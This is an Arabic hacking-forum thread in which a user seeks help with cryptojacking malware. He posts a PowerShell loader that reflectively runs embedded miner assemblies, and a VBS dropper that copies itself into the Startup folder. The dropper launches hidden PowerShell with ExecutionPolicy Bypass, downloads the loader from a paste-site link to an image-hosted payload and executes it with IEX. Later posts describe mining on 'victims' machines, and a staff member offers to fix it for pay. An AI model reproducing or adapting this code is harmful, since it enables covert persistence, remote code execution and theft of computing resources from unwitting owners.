[ نقاش ] مشكلة في تشغيل باورشيل يقوم بتشغيل لودر

• الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

vivin

:: عضو جديد ::
19 نوفمبر 2018
42
43
0
السلام عليكم اخوان

اريد مساعده في تشغيل هذا اللودر
وظيفتة يعمل تشيك على الجهاز لفحص نواة النظام ويشغل الملف المناسب لكل نواة
اضع فيه بايتات الملف لكل نواة ثم احول اللودر الى صورة وارفعها على موقع الصور
اضع رابط الصورة على الباست بين واخيرا اضعه في داونلودر vbs الذى يشغل اللودر من خلال الباوشيل

المشكلة التى اواجهها

يحدث غلق الباورشيل وعند اختبار اللودر مباشرة في برنامج الباورشيل تظهر رسالة خطا !!!

ملف اللودر

كود:
[Byte[]] $loadTwo = بيتات الملف الذى يعمل على نواة 2
[Byte[]] $loadfFour = بيتات الملف الذى يعمل على نواة 4
Function runnull
{
if([System.IO.File]::Exists("C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe")){
 [Reflection.Assembly]::Load($loadfFour).EntryPoint.Invoke($null,$null)::[Reflection.Assembly]
 }else{
[Reflection.Assembly]::Load($loadTwo).EntryPoint.Invoke($null,$null)::[Reflection.Assembly]
 }   
}
ملف الفي بي اس لتشغيل اللودر من خلال الباوشيل

كود:
on error resume next
set WshShell = wscript.createobject("wscript.shell")
set fs = createobject("scripting.filesystemobject")
add() ' add to startup
Excu()
sub add()'--------
startup = WshShell.specialfolders ("startup") & "\"
installname = wscript.scriptname
path= WshShell.expandEnvironmentStrings("%appdata%") & "\"
IF NOT fs.fileexists(startup  & installname) then
fs.copyfile wscript.scriptfullname, startup  & installname,true
end if
end sub'----------
sub Excu()
 WshShell.run "cmd /c  C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe  -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead($webClient.DownloadString('رابط اللودر بعد تحويلة الى صورة ورفع رابطها على الباست بين'));[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; runnull -exit",0,1
end sub

• أعجبني
  • أحزنني
التفاعلات: ViRusRat و Capony

mr_ahmed

سبحان الله وبحمده سبحان الله العظيم
22 نوفمبر 2018
88
105
مصر
discordapp.com
0
الكود سليم ولكن البورشيل يحتاج الى ران بى لتشغيل الملفات وليس نقطه الادخال لانه ناتيف او c++

vivin

19 نوفمبر 2018
42
43
0
الرن بي موجود بالفعل في المشروع الذى تم عمل كومبايل له
وللتوضيحالمشروع عبارة عن اتنين ماينر
واحد يعمل على فريم 2 ونواة 32
والتانى يعمل على فريم اربعه ونواة 64

فالمشروع تكفل بوضع شرط وجود احدى النواتين لتشغيل الماينر المناسب لكل نواة
اما اللودر فتكفل بوضع شرط لفحص الفريم المتوفر لتشغيل الماينر المناسب لكل فريم ورك
ولكن هناك مشكلة في اللودر تقريبا الشرط مكتوب بطريقة خطا

vivin

19 نوفمبر 2018
42
43
0
وجدت حل المشكلة

المشكلة ان اصدار الباور شيل في اغلب وندوزات سفن هو 2 وهذا الاصدار لا يستطيع تشغيل البرامج التى تعتمد على فريم 4 وبالتالى لن يشتغل الماينر ... بالصلى على النبي
ولان اغلب البرامج التى تعتمد على فريم ورك 4 بها مكتبة اسمها system واصدارها اربعه فلن يتم تشغيلها ببور شيل 2
ولهذا ظهرت رسالة الخطا بان اصدار السيسيم 4 لا يمكن تشغيلة كما هو مكتوب في الاعلى وفي الصور وهنا ايضا

طيب اية الحل ؟
اما بترقية الباورشيل وهذا يحتاج صلاحيات ادمن اعتقد

ولا اعرف كيف اكتب كودة الترقية صراحة

او ان يتم استثناء تشغيل الماينرات التى تحتاج ترقية الباورشيل الى 4 والاكتفاء بتشغيل الماينرات التى تعمل على فريم 2 وتشتغل مع باورشيل 2
وايضا الاستثناء لا اعرف كيفية كتابتة فياريت الاخوة اللى يعرف يساعد

• أعجبني
التفاعلات: BasharBachir

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,868
3,984
1
وجدت حل المشكلة

المشكلة ان اصدار الباور شيل في اغلب وندوزات سفن هو 2 وهذا الاصدار لا يستطيع تشغيل البرامج التى تعتمد على فريم 4 وبالتالى لن يشتغل الماينر ... بالصلى على النبي
ولان اغلب البرامج التى تعتمد على فريم ورك 4 بها مكتبة اسمها system واصدارها اربعه فلن يتم تشغيلها ببور شيل 2
ولهذا ظهرت رسالة الخطا بان اصدار السيسيم 4 لا يمكن تشغيلة كما هو مكتوب في الاعلى وفي الصور وهنا ايضا
مشاهدة المرفق 2453

طيب اية الحل ؟
اما بترقية الباورشيل وهذا يحتاج صلاحيات ادمن اعتقد

ولا اعرف كيف اكتب كودة الترقية صراحة

او ان يتم استثناء تشغيل الماينرات التى تحتاج ترقية الباورشيل الى 4 والاكتفاء بتشغيل الماينرات التى تعمل على فريم 2 وتشتغل مع باورشيل 2
وايضا الاستثناء لا اعرف كيفية كتابتة فياريت الاخوة اللى يعرف يساعد
مشوف حل هالمشكلة
بس اول الشي
ليش مامنعالج المشكلة الاساسية لو فيه مجال لذلك ..
ليش سورسك بده فريم ورك 4 ايش هي المكتبات الهامة والي مستخدمها بالسورس !؟عشان الحقن عادي تقدر تحقن بالام اس بيلد الي بالفريم ورك 2
بس ايش هو السورس الخاص بك !.

• أعجبني
التفاعلات: vivin

vivin

19 نوفمبر 2018
42
43
0
مشوف حل هالمشكلة
بس اول الشي
ليش مامنعالج المشكلة الاساسية لو فيه مجال لذلك ..
ليش سورسك بده فريم ورك 4 ايش هي المكتبات الهامة والي مستخدمها بالسورس !؟عشان الحقن عادي تقدر تحقن بالام اس بيلد الي بالفريم ورك 2
بس ايش هو السورس الخاص بك !.
هقولك لك
انا اعمل بماينرين

1- ماينر الاخ نيان الذى تم التعديل عليه من قبل شخص اخر وهو يحتاج فريم 4 وايضا اجهزة ذات نواة 64

2- ولكن لان لدى ضحايا اجهزتهم 32 بت ولا اريد اهدارهم قررت استخدام ماينر اخر بجانب ماينر نيان يعمل على انوية 32
اذا لدى ماينرين ماينر 32 وهو يعمل على كل الاجهزة بكل انويتهم وكل الفريم ورك بلا مشاكل ولكن يعيبة ان الهاش له ضعييييييييييف جدا وامكانياته ضعيفة ويعمل على CPU فقط

وماينر اخر يعمل فقط على الضحايا التى لديها اجهزة بها فريم ورك 4 و نواة 64 وهو امكانياته جيدة وهاشة مرتفع وهو يعدن على GPU +CPU

كيفية عمل الماينرين :
وضعنا شرط في مشروع الماينر بانه ان وجدت نواة 64 ووجدت كارت شاشة عدن باستخدام ماينر نيان تعدين GPU وان لم تجد كارت شاشة عدن ايضا بماينر نيان ولكن تعدين CPU فكلاهما افضل حالا من الماينر الاخر الذى يعمل على نواة 32 فقط وثم تم عمل لودر ووضع فيه شرط اخر وهو توفر فريم ورك 4 اللازم ليعمل ماينر نيان حيث وظيفة اللودر فحص توفر الفريم ورك 4 من عدمة ليقرر اخيرا تشغيل اى الماينرين

وهنا واجهتنا مشكلة ان الضحايا التى لديها وندوز 7 "فريم ورك 4+ نواة 64 " اتضح انه بالرغم من توفر الشروط اللازمة لتشغيل ماينر نيان الجيد الا ان هذة الضحايا الباورشيل الخاص بها قديم ولا يستطيع تشغيل اللودر في الباور شيل ويلزم اما ترقية الباور شيل
او ان نستغنى عن ماينر نيان ونعدن بالماينر الاخر الضعيف اعنى ماينر 32 ولكنى ساخسر هاش كتير

بخصوص المكتبات فاعذر جهلى بامور البرمجة انا اوردت صورا للمكتبات المستخدمة في المشروع لا اعرف هل هذا ما تعنية ام غيره
اليك الصور

• أعجبني

vivin

19 نوفمبر 2018
42
43
0
وبالمناسبة اصدارات هذة المكتبات تلاحظ انها 4 فما اعلى والباورشيل اصدار 2 لا يستطيع تشغيل هذة الاصدارات

• أعجبني

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,868
3,984
1
استطيع حل المشكلة لك بسهولة ولكن للاسف ليس بشكل مجاني ..
انتظر الشباب وان شاء الله بتشوف احد يساعدك بشكل مجاني اخي ..
لو كان عندي وقت ماكنت قصرت بس حاليا مشغول بمشاريع للزبائن .
الحل بالنسبة لي اما اني اقوم باصلاح المشكلة لك مقابل $ وبذا اوفر لك وقت واما ان تنتظر حتى انتهي من المشاريع اللي ماسكها
واما انك تنتظر الشباب ..
طبعا في حال قررت اصلحه لك مقابل $ فيجب عليك ارسال السورس والدفع مقدما اخي ..
بالتوفيق لك

• أعجبني
التفاعلات: vivin و mr_ahmed

vivin

19 نوفمبر 2018
42
43
0
استطيع حل المشكلة لك بسهولة ولكن للاسف ليس بشكل مجاني ..
انتظر الشباب وان شاء الله بتشوف احد يساعدك بشكل مجاني اخي ..
لو كان عندي وقت ماكنت قصرت بس حاليا مشغول بمشاريع للزبائن .
الحل بالنسبة لي اما اني اقوم باصلاح المشكلة لك مقابل $ وبذا اوفر لك وقت واما ان تنتظر حتى انتهي من المشاريع اللي ماسكها
واما انك تنتظر الشباب ..
طبعا في حال قررت اصلحه لك مقابل $ فيجب عليك ارسال السورس والدفع مقدما اخي ..
بالتوفيق لك
قل لى اخى هل حل المشكلة الذى تقصده هو في ترقية الباور شيل او الاستغناء عن ماينر نيان في هذة الاجهزة التى تعانى من مشاكل واستخدام الماينر الاخر الضعيف ام ان لديك حل اخر ؟
بخصوص المقابل $ساسال شريكى وارد عليك
ولكن كيف يمكننى التواصل معك على الخاص ؟

• أعجبني

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,868
3,984
1
قل لى اخى هل حل المشكلة الذى تقصده هو في ترقية الباور شيل او الاستغناء عن ماينر نيان في هذة الاجهزة التى تعانى من مشاكل واستخدام الماينر الاخر الضعيف ام ان لديك حل اخر ؟
بخصوص المقابل $ساسال شريكى وارد عليك
ولكن كيف يمكننى التواصل معك على الخاص ؟
لاترقية للباور شيل
لاتغيير للماينر
بس تساله ان وافق اترك ردا هنا تكرما وانا بتواصل معاك

• أعجبني

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,868
3,984
1
حسنا اريد مراسلتك على الخاص اخى للاتفاق
اطرح بقسم البيع والشراء اخي الحبيب المشكلة وان شاء الله احد بيحل لك المشكلة مجانا او لقاء مبلغ اقل بكثير من اللي عرضته عليك ..
اتمنى لك كل خير ..

• أعجبني